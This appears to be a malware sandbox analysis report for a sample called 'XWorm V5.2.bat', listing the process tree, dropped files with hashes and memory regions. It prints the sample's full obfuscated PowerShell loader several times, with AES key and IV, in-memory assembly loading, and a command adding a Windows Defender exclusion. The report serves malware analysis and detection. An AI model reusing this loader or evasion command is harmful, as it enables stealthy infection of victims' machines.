                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                        5⤵
                                                          PID:1632
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                          5⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1280
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                                      3⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:536
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                                      3⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2112
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                        4⤵
                                                          PID:2900
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2928
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2880
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                                      2⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2664
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                        3⤵
                                                          PID:2292
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                          3⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1984

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat

                                                      Filesize

                                                      12.3MB

                                                      MD5

                                                      1a270a2d79f958a83af1ab2b5805e43c

                                                      SHA1

                                                      aeb2f51a0d1377a25fdcd614fc96fe6b3afbbeeb

                                                      SHA256

                                                      5a0ee0516cf26c772261c81a9cbc45fa625268576debb7d8b38609687554544c

                                                      SHA512

                                                      00bec3f89f9f27236adf0167d6382b60a2be56bdb6b00aae0117396e30e77a993b97d2b7f2af3ae96b81bce0b55bf177d4c4d0c272df05d72c2dc55577b14191

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EZ3IQV36WKD3F1BFXVG1.temp

                                                      Filesize

                                                      7KB

                                                      MD5

                                                      93e39f76d77b580fa62d450532298270

                                                      SHA1

                                                      354372f4ed848fe8c790e8e6e700a595e002c828

                                                      SHA256

                                                      b833caf25d47174e317e35221ed2403bff6ac13af2d054ef654dd7ef745b32ae

                                                      SHA512

                                                      230a04565c3430e12963022e42b04ab725f8882ecf2c9edb6af61b50a985853eb2cc7e97434125003ccc46fa70330d263b7db3ce95e12d61d090fe9a2e2f3a6c

                                                    • \??\PIPE\srvsvc

                                                      MD5

                                                      d41d8cd98f00b204e9800998ecf8427e

                                                      SHA1

                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                      SHA256

                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                      SHA512

                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                    • memory/536-26-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

                                                      Filesize

                                                      2.9MB

                                                    • memory/536-27-0x0000000001DC0000-0x0000000001DC8000-memory.dmp

                                                      Filesize

                                                      32KB

                                                    • memory/2596-3-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

                                                      Filesize

                                                      9.9MB

                                                    • memory/2596-34-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

                                                      Filesize

                                                      9.9MB

                                                    • memory/2820-20-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

                                                      Filesize

                                                      9.9MB

                                                    • memory/2820-0-0x000007FEF5493000-0x000007FEF5494000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/2820-2-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

                                                      Filesize

                                                      9.9MB

                                                    • memory/2820-1-0x0000000000CA0000-0x0000000001EE2000-memory.dmp

                                                      Filesize

                                                      18.3MB

                                                    • memory/2880-8-0x000000001B6A0000-0x000000001B982000-memory.dmp

                                                      Filesize

                                                      2.9MB

                                                    • memory/2880-9-0x0000000002970000-0x0000000002978000-memory.dmp

                                                      Filesize

                                                      32KB